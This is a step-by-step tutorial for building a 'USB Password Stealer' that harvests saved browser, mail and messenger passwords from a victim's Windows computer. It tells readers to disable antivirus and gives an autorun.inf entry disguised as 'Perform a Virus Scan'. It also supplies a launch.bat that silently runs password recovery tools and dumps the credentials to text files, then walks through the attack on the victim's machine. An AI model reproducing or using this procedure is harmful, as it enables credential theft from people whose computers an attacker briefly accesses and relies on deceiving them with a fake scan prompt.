Every security system has a vulnerability and all security systems have the same vulnerability – Human. Most people simply tick “Remember Me” on the websites they visit, as this is convenient. This happens especially often on private computers, which are not used by others, but often also on service devices, to which a hacker has to gain access for only a few seconds, to read all stored passwords.
In this tutorial, I’ll show you step by step how to create a USB Password Stealer. I have successfully performed this hack on the following operating systems: Windows 2000, XP, Vista, 7 and 8.
IMPORTANT: For this hack, the attacker needs physical access to the victim’s computer.
In addition, we need various software to read the passwords. Here are a few examples I’ve used for this tutorial:
- MessenPass – Link to the free Download
MessenPass is a password recovery tool that reveals the passwords of some popular instant messenger applications.
- Mail PassView – Link to the free Download
Mail PassView is a small password recovery tool that reveals passwords and other account details for, for example, Outlook Express, Windows Mail, POP3.
- IE Passview – Link to the free Download
IE Passview is another small program that allows you to view saved passwords in Internet Explorer.
- Protected storage PassView (PSPV) – Link to the free Download
Protected Storage PassView is a small utility that displays the passwords of Internet Explorer, Outlook Express, and MSN Explorer.
- Password Fox – Link to the free Download
Password Fox is a small program that displays saved passwords in Mozilla Firefox.
Note: These programs tend to get a lot of attention from antivirus software. Please disable your antivirus program before you follow the steps. Of course there are several other programs for other messengers or browsers like Chrome, Opera etc. – Link to more Software
Step 1 – Software Download
- First load all the tools onto your USB stick. The tools are just a few .exe files (mspass.exe, mailpv.exe, iepv.exe, pspv.exe und passwordfox.exe).
Step 2 – create autorun.inf
- Create a new Notepad document and write the following text:
ACTION= Perform a Virus Scan
- Save the Notepad document and name it “autorun.inf”.
Step 3 – Create launch.bat
- Create another Notepad document with the following content:
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt
- Save the Notepad document and name it “launch.bat”.
Step 4 – Prepare USB stick
- Copy the autorun.inf and launch.bat to the USB stick.
Step 5 – Perform an attack
- Insert the USB flash drive into the victim’s computer and the startup window will open.
- Select the first option in the pop-up window (Perform a Virus Scan).
- Now all password recovery tools run in the background (This process takes only a few seconds). The passwords are stored in the .txt file.
- Remove the USB stick, and look at the saved passwords in the .txt file on your own computer.